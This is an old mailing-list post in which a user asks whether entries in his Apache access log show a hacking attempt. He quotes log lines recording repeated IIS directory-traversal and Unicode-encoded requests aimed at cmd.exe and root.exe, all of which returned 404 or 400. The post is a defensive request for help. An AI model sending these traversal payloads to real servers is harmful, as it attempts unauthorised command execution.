[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Strange httpd/access_log entry




Can anyone help me out here... 

I found these entries, is someone trying to hack me?  
What is really weird is in a browser, if I type file://64.163.212.171/
I get the entire listing for my HD

Doing a host -a 64.163.212.171 yields a reverse entry for pacbel... 

Log entries are:

64.163.212.171 - - [11/Apr/2002:11:01:34 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
64.163.212.171 - - [11/Apr/2002:11:01:36 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
64.163.212.171 - - [11/Apr/2002:11:01:39 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
"-"
64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 329 "-" "-"
64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 329 "-" "-"
64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 345 "-" "-"
64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
"-"
64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
"-"
64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
"-"
64.163.212.171 - - [11/Apr/2002:11:01:43 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
"-"
64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
"-"
64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
"-"
64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
"-" "-"
64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
"-"


-- 
Best regards,
Gary   



-
To unsubscribe, send email to majordomo@silug.org with
"unsubscribe silug-discuss" in the body.